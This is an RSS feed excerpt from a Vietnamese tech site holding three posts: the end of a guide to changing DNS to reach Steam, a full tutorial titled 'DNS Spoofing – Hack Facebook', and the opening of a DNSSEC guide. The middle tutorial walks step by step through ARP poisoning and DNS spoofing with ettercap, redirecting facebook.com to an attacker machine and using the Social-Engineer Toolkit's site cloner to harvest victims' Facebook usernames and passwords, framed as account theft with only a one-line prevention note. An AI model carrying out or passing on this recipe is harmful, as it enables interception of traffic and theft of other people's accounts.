<figure id="attachment_60177" aria-describedby="caption-attachment-60177" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-60177 size-full" src="https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-3.jpg" alt="How to change DNS on Windows" width="800" height="581" srcset="https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-3.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-3-300x218.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-3-768x558.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-3-120x86.jpg 120w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-3-750x545.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-60177" class="wp-caption-text">How to change DNS on Windows</figcaption></figure>
<p><strong>Step 2:</strong> In the Control Panel window, set the view mode to Category and continue selecting &#39;View network status and tasks&#39;.</p>
<figure id="attachment_60178" aria-describedby="caption-attachment-60178" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-60178 size-full" src="https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-4.jpg" alt="Select &#39;View network status and tasks&#39;." width="800" height="450" srcset="https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-4.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-4-300x169.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-4-768x432.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-4-750x422.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-60178" class="wp-caption-text">Select &#39;View network status and tasks&#39;.</figcaption></figure>
<p><strong>Step 3:</strong> In the Connections section, click on Wi-Fi to open the Wi-Fi Status window, then select &#39;Properties&#39;.</p>
<figure id="attachment_60179" aria-describedby="caption-attachment-60179" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-60179 size-full" src="https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-5.jpg" alt="Select &#39;Properties&#39;" width="800" height="492" srcset="https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-5.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-5-300x185.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-5-768x472.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-5-750x461.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-60179" class="wp-caption-text">Select &#39;Properties&#39;</figcaption></figure>
<p><strong>Step 4:</strong> In the list of options, find and select Internet Protocol Version 4 (TCP/IPv4) and press &#39;Properties&#39;.</p>
<figure id="attachment_60180" aria-describedby="caption-attachment-60180" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-60180 size-full" src="https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-6.jpg" alt="Select Internet Protocol Version 4 (TCP/IPv4) then click &#39;Properties&#39; to change DNS" width="800" height="479" srcset="https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-6.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-6-300x180.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-6-768x460.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-6-750x449.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-60180" class="wp-caption-text">Select Internet Protocol Version 4 (TCP/IPv4) then press &#39;Properties&#39;.</figcaption></figure>
<p><strong>Step 5:</strong> Check &#39;Use the following DNS server addresses&#39;.  Fill in the desired DNS information in the Preferred DNS and Alternate DNS sections.</p>
<figure id="attachment_60181" aria-describedby="caption-attachment-60181" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-60181 size-full" src="https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-7.jpg" alt="Fill in DNS information" width="800" height="460" srcset="https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-7.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-7-300x173.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-7-768x442.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-7-750x431.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-60181" class="wp-caption-text">Fill in DNS information</figcaption></figure>
<p><strong>Step 6:</strong> Perform a restart of the computer system to update the changes made.</p>
<h3 id="ftoc-huong-dan-doi-dns-tren-macos" class="ftwp-heading"><strong>Instructions for changing DNS on MacOS</strong></h3>
<p><strong>Step 1:</strong> To perform <strong>How to change DNS</strong> On your Mac, click the Apple icon in the upper left corner of the screen to open the Apple menu > Then select System Preferences.</p>
<p>When the System Preferences window appears, go to the Network section.</p>
<figure id="attachment_60182" aria-describedby="caption-attachment-60182" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-60182 size-full" src="https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-8.jpg" alt="How to change DNS on MacOS" width="800" height="450" srcset="https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-8.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-8-300x169.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-8-768x432.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-8-750x422.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-60182" class="wp-caption-text">How to change DNS on MacOS</figcaption></figure>
<p><strong>Step 2:</strong> To edit network settings, click on the &#39;Advanced&#39; button</p>
<figure id="attachment_60183" aria-describedby="caption-attachment-60183" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-60183 size-full" src="https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-9.jpg" alt="Click on the &#39;Advanced&#39; button to change DNS" width="800" height="450" srcset="https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-9.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-9-300x169.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-9-768x432.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-9-750x422.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-60183" class="wp-caption-text">Click on the &#39;Advanced&#39; button</figcaption></figure>
<p><strong>Step 3:</strong> In the DNS tab, click the plus “+” icon to enter the Preferred DNS address.</p>
<figure id="attachment_60184" aria-describedby="caption-attachment-60184" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-60184 size-full" src="https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-10.jpg" alt="Click the plus “+” icon to enter the Preferred DNS address" width="800" height="450" srcset="https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-10.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-10-300x169.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-10-768x432.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-10-750x422.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-60184" class="wp-caption-text">Click the plus “+” icon to enter the Preferred DNS address</figcaption></figure>
<p><strong>Step 4:</strong> Click the plus “+” icon again to add the Alternate DNS address.  Then, click OK and Apply to apply the changes.</p>
<figure id="attachment_60185" aria-describedby="caption-attachment-60185" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-60185 size-full" src="https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-11.jpg" alt="Click the plus “+” icon to add an Alternate DNS address" width="800" height="450" srcset="https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-11.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-11-300x169.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-11-768x432.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-11-750x422.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-60185" class="wp-caption-text">Click the plus “+” icon to add an Alternate DNS address</figcaption></figure>
<h2 id="ftoc-nhung-dia-chi-dns-mien-phi-ban-co-the-thu" class="ftwp-heading"><strong>Free DNS addresses you can try</strong></h2>
<ul>
<li>Cloudflare: 1.1.1.1 and 1.0.0.1</li>
<li>Google Public DNS: 8.8.8.8 and 8.8.4.4</li>
<li>OpenDNS: 208.67.222.222 and 208.67.220.220</li>
<li>NordVPN: 103.86.96.100 and 103.86.99.100</li>
</ul>
<p><strong>Note:</strong> Using VPN is not recommended as it may violate the terms of service <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fhuong-dan-hack-account-steam-choi-game-chua-free%2F" class="local-link" rel="noopener">Steam</a> and resulted in the account being banned.</p>
<h2 id="ftoc-loi-ket" class="ftwp-heading"><strong>Epilogue</strong></h2>
<p>So, equal <strong>How to change DNS</strong> Following the instructions above, you can confidently access Steam without being affected by blocking from network operators.  Wishing you success and great hours of entertainment on Steam!</p>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/how-to-change-dns-to-access-steam-when-blocked/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>DNS Spoofing &#8211; Hack Facebook</title>
		<link>https://en.anonyviet.com/dns-spoofing-hack-facebook/</link>
					<comments>https://en.anonyviet.com/dns-spoofing-hack-facebook/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Wed, 01 Feb 2023 05:13:04 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[DNS]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[SPOOFING]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=7750</guid>

					<description><![CDATA[I would like to briefly talk about DNS &#8211; Domain Name System &#8211; Domain name resolution system. Join the channel Telegram of the AnonyViet 👉 Link 👈 When you enter a web browser and type facebook.com, the DNS system will resolve it for you to an IP address so that you can communicate and transmit [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p>I would like to briefly talk about DNS &#8211; Domain Name System &#8211; Domain name resolution system.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p>When you enter a web browser and type facebook.com, the DNS system will resolve it for you to an IP address so that you can communicate and transmit data on the network.</p>
<p>This article will be divided into 2 parts:</p>
<p><strong>Part 1: Using ettercap to perform DNS Spoofing</strong></p>
<p><strong>Part 2: Using Setoolkit and Ettercap to steal facebook accounts.</strong></p>
<p>Perform:</p>
<p><strong>Part 1: Using ettercap to perform DNS Spoofing</strong></p>
<p>First, I will <strong>ping facebook.com</strong> What is the IP address corresponding to the facebook.com domain name?</p>
<p><img fetchpriority="high" decoding="async" id="fullsizeMedia" title="DNS Spoofing - Hack Facebook 25" src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/facebook_zpsf1b7f07c.jpg" alt=" photo facebook_zpsf1b7f07c.jpg" width="666" height="185" data-link="src{:fullsizeUrl} width{:rsWidth} height{:rsHeight}"/></p>
<p>Next, go to Kali Linux and perform Enable IP Forwarding.</p>
<p><strong>#echo 1 > /proc/sys/net/ipv4/ip_forward</strong></p>
<p><img decoding="async" loading="lazy" id="fullsizeMedia" title="DNS Spoofing - Hack Facebook 26" src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/ipforwarding_zps9e90c910.jpg" alt=" photo ipforwarding_zps9e90c910.jpg" width="748" height="118" data-link="src{:fullsizeUrl} width{:rsWidth} height{:rsHeight}"/></p>
<p>Next edit the file <strong>etter.dns</strong>.</p>
<p>Use the locate etter.dns command to see where it is currently.  Once done, proceed to add the following records:</p>
<p><strong>facebook.com A 192.168.0.109</strong></p>
<p><strong>*.facebook.com A 192.168.0.109</strong></p>
<p>With the address 192.168.0.109 is the Attacker machine IP.</p>
<p><img decoding="async" loading="lazy" id="fullsizeMedia" title="DNS Spoofing - Hack Facebook 27" src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/etterdns_zps6db36b10.jpg" alt=" photo etherdns_zps6db36b10.jpg" width="741" height="65" data-link="src{:fullsizeUrl} width{:rsWidth} height{:rsHeight}"/></p>
<p>Note: May be located at /usr/local/share/ettercap/etter.dns with Backtrack 5 versions</p>
<p>When done, save and exit <strong>:wq</strong></p>
<p><img decoding="async" id="placeHolder_0" title="DNS Spoofing - Hack Facebook 28" src="https://i1054.photobucket.com/albums/s485/hocmang/facebook2_zpscdfe6288.jpg" alt=" photo facebook2_zpscdfe6288.jpg" data-link="id{:placeHolderId}"/></p>
<p>Perform dns spoofing with the command</p>
<p><strong>#ettercap -T -q -M arp:remote -P dns_spoof //</strong></p>
<p><img decoding="async" loading="lazy" id="fullsizeMedia" title="DNS Spoofing - Hack Facebook 29" src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/ettercap_zpsac23a3f7.jpg" alt=" photo ettercap_zpsac23a3f7.jpg" width="800" height="600" data-link="src{:fullsizeUrl} width{:rsWidth} height{:rsHeight}"/></p>
<p>Then go to the client machine, re-assign the address with the command <strong>>ipconfig /renew</strong></p>
<p><img decoding="async" id="placeHolder_0" title="DNS Spoofing - Hack Facebook 30" src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/ettercap3_zps6c7aa75f.jpg" alt=" photo ettercap3_zps6c7aa75f.jpg" data-link="id{:placeHolderId}"/></p>
<p>Now go to the PC client to access facebook.com you will see it still accesses normally.  But when pinging to facebook.com, the IP reply is 192.168.0.109 – Attacker&#8217;s IP.</p>
<p><img decoding="async" loading="lazy" id="fullsizeMedia" title="DNS Spoofing - Hack Facebook 31" src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/pingfacebook2_zps52486770.jpg" alt=" photo pingfacebook2_zps52486770.jpg" width="665" height="154" data-link="src{:fullsizeUrl} width{:rsWidth} height{:rsHeight}"/></p>
<p>OK.  So you have succeeded in driving data through your computer, now we will proceed to steal Facebook account.</p>
<p><strong>Part 2: Using setoolkit and ettercap to perform stealing facebook accounts.</strong></p>
<p>Tools used:</p>
<p><strong>setoolkit:</strong> clone website, capture username/password</p>
<p><strong>ettercap:</strong> Scan hosts + ARP poisoning (ARP spoofing) + DNS spoofing + Sniff (eavesdropping).</p>
<p><strong>Demo video:</strong> <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DJZhX_N0HtQk%26amp%3Bfeature%3Dyoutu.be" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Youtube</a></p>
<div class="jeg_video_container jeg_video_content"><iframe title="Kali Linux - DNS Spoofing" width="500" height="375" src="https://www.youtube.com/embed/JZhX_N0HtQk?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></div>
<p><strong>Instructions with pictures</strong></p>
<p>Enable setoolkit</p>
<p><strong>#/usr/share/set/setoolkit</strong></p>
<p><img decoding="async" title=" " src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/setoolkit1_zps5d9f340a.jpg" alt="DNS Spoofing - Hack Facebook 20"/></p>
<p>Agree to terms of use Click <strong>y</strong> -> Enter</p>
<p><img decoding="async" title="DNS Spoofing - Hack Facebook 32" src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/setoolkit2_zps3d0fa4a2.jpg" alt=" photo setoolkit2_zps3d0fa4a2.jpg"/></p>
<p>Select <strong>1) Social-Engineering Attacks</strong></p>
<p><img decoding="async" title="DNS Spoofing - Hack Facebook 33" src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/setoolkit3_zps2970c553.jpg" alt=" photo setoolkit3_zps2970c553.jpg"/></p>
<p>Select <strong>2) Website Attack Ventors</strong></p>
<p><img decoding="async" src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/setoolkit4_zpsebc6d6a0.jpg" alt="DNS Spoofing - Hack Facebook 21" title="DNS Spoofing - Hack Facebook 34"/></p>
<p>Select <strong>3) Credential Harvester Attack Method</strong></p>
<p><img decoding="async" src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/setoolkit5_zpsb689a24b.jpg" alt="DNS Spoofing - Hack Facebook 22" title="DNS Spoofing - Hack Facebook 35"/></p>
<p>Select 2) Site Cloner</p>
<p><img decoding="async" src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/setoolkit6_zpsaacc10a1.jpg" alt="DNS Spoofing - Hack Facebook 23" title="DNS Spoofing - Hack Facebook 36"/></p>
<p>Enter the Attacker&#8217;s IP address: <strong>192.168.0.109</strong></p>
<p><img decoding="async" title=" " src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/setoolkit7_zpsf98984aa.jpg" alt="DNS Spoofing - Hack Facebook 24"/></p>
<p>Type the path you want to clone the website: <strong>https://www.facebook.com</strong></p>
<p><img decoding="async" title=" " src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/setoolkit8_zpsb271be43.jpg" alt="DNS Spoofing - Hack Facebook 25"/></p>
<p>When done, turn on another Terminal, type ettercap -G to enable ettercap configuration with the interface</p>
<p>Select <strong>Sniff->Unified sniffing</strong></p>
<p><img decoding="async" src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/ettercap01_zps46acda04.jpg" alt="DNS Spoofing - Hack Facebook 26" title="DNS Spoofing - Hack Facebook 37"/></p>
<p>Select the port for eavesdropping:<strong> eth0</strong></p>
<p><img decoding="async" title=" " src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/ettercap02_zpsa0ff9811.jpg" alt="DNS Spoofing - Hack Facebook 27"/></p>
<p>Select<strong> Hosts-> Scan for hosts</strong></p>
<p><strong>Host-> Hosts List</strong></p>
<p><img decoding="async" src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/ettercap03_zpsfeb18f68.jpg" alt="DNS Spoofing - Hack Facebook 28" title="DNS Spoofing - Hack Facebook 38"/></p>
<p>Choose 2 addresses to conduct eavesdropping</p>
<p><img decoding="async" src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/ettercap04_zps33900ce2.jpg" alt="DNS Spoofing - Hack Facebook 29" title="DNS Spoofing - Hack Facebook 39"/></p>
<p>Implement ARP possoning (ARP spoofing)</p>
<p><img decoding="async" src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/ettercap05_zps5f44c72f.jpg" alt="DNS Spoofing - Hack Facebook 30" title="DNS Spoofing - Hack Facebook 40"/></p>
<p>Click select <strong>Sniff remote connections.</strong></p>
<p><img decoding="async" src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/ettercap06_zps4a8b5d82.jpg" alt="DNS Spoofing - Hack Facebook 31" title="DNS Spoofing - Hack Facebook 41"/></p>
<p>Into the <strong>/etc/ettercap/etter.dns</strong> Add 2 lines:</p>
<p><strong>facebook.com A 192.168.0.109</strong></p>
<p><strong>*.facebook.com A 192.168.0.109</strong></p>
<p><img decoding="async" title=" " src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/ettercap09_zps4dedb32d.jpg" alt="DNS Spoofing - Hack Facebook 32"/></p>
<p>Into the <strong>Plugins->Manage the plugins</strong></p>
<p><img decoding="async" title=" " src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/ettercap07_zps06dab6cc.jpg" alt="DNS Spoofing - Hack Facebook 33"/></p>
<p>Click on<strong> dns_spoof</strong> to enable this feature</p>
<p><img decoding="async" title=" " src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/ettercap10_zpsf3eb54b9.jpg" alt="DNS Spoofing - Hack Facebook 34"/></p>
<p><strong>Start sniffing</strong></p>
<p><img decoding="async" src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/ettercap11_zpsa3c03802.jpg" alt="DNS Spoofing - Hack Facebook 35" title="DNS Spoofing - Hack Facebook 42"/></p>
<p>On the client computer, open a web browser to facebook.com, enter username/password</p>
<p><img decoding="async" src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/facebook_zpse129988d.jpg" alt="DNS Spoofing - Hack Facebook 36" title="DNS Spoofing - Hack Facebook 43"/></p>
<p>setoolkit will catch this username/password</p>
<p><img decoding="async" title=" " src="https://i1054.photobucket.com/albums/s485/hocmang/hocmang/Kali%20Linux/DNS%20Spoofing/facebook2_zps28643404.jpg" alt="DNS Spoofing - Hack Facebook 37"/></p>
<p>The username/password information is displayed in clear-text as above, so you already have the client&#8217;s facebook account.</p>
<p><strong>Updated on September 15, 2015:</strong></p>
<p>In the new version of Kali 2.0, when the clone site returns, it will be saved in the /var/www/ path, copy these files to the /var/www/html path then proceed normally:</p>
<p>Note: remember to change the permissions to read and write for these files:</p>
<p>#cd /var/www/html<br />#chmod 777 ./*</p>
<p>Includes 3 files:<br />– index.html : interface of facebook.com<br />– post.php: function to get username/password when you enter it and save it in haverster_*.txt file<br />– harvester_date_time.txt : save the obtained information.</p>
<p><img decoding="async" id="placeHolder_0" class="placeHold" src="https://i1187.photobucket.com/albums/z386/atphanqt/clone1.png" alt="  photo clone1.png" data-link="id{:placeHolderId}" title="DNS Spoofing - Hack Facebook 44"/></p>
<p>In the same way you can steal many other accounts.</p>
<p><strong>How to prevent DNS Spoofing:</strong></p>
<p>In addition to the two ways in the article ARP spoofing is to deploy port-security and DAI, you should deploy more DHCP snooping to prevent fake DHCP levels.</p>
<p>P/s: As you have seen, if the attacker has entered our internal network with dark intentions, there are many tools to extract information about his company.  Thus, if any employee intends to sabotage the company, it is quite difficult to investigate.</p>
<p>By the way, if you have any useful monitoring tools or programs, please share them with me.</p>
<p>Close,</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;575&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/dns-spoofing-hack-facebook/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2015/12/dnsf.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Hướng dẫn DNSSEC (DNS Security Extension) Full &#8211; Windows Server 2012 R2</title>
		<link>https://en.anonyviet.com/huong-dan-dnssec-dns-security-extension-full-windows-server-2012-r2/</link>
					<comments>https://en.anonyviet.com/huong-dan-dnssec-dns-security-extension-full-windows-server-2012-r2/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sat, 28 Jan 2023 03:23:15 +0000</pubDate>
				<category><![CDATA[Network]]></category>
		<category><![CDATA[dẫn]]></category>
		<category><![CDATA[DNS]]></category>
		<category><![CDATA[DNSSEC]]></category>
		<category><![CDATA[Extension]]></category>
		<category><![CDATA[Full]]></category>
		<category><![CDATA[Huong]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[Windows]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=5357</guid>

					<description><![CDATA[1) DNS Tham gia kênh Telegram của AnonyViet  👉 Link 👈 DNS là một giao thức cho phép phân giải từ host name sang địa chỉ IP và ngược lại. Hoat động trên port 53, cấu trúc của DNS là cơ sở dữ liệu dạng cây thư mục. Bao gồm từ Top Level Domain (TLDs), [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p><b>1) DNS</b></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Tham gia kênh <span style="color: #0000ff;">Telegram</span> của <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span> 👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p>DNS là một giao thức cho phép phân giải từ host name sang địa chỉ IP và ngược lại. Hoat động trên port 53, cấu trúc của DNS là cơ sở dữ liệu dạng cây thư mục. Bao gồm từ Top Level Domain (TLDs), Second Level Domain (SLDs), Sub Domain (Host).</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F14.jpg" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" title="1" src="https://huypd.files.wordpress.com/2013/11/1_thumb2.jpg?w=673&amp;h=375" alt="1" width="673" height="375" border="0"/></a></p>
<p>DNS có 3 zone chính primary zone, secondary zone và stub zone. Dữ liệu của các zone được lưu trong một file gọi là zone file. Trong zone file chứa dữ liệu DNS, được thể hiện qua các record như SOA, A, CNAME, MX, NS, SRV.</p>
<p> </p>
<p><b>2) DNSSEC</b></p>
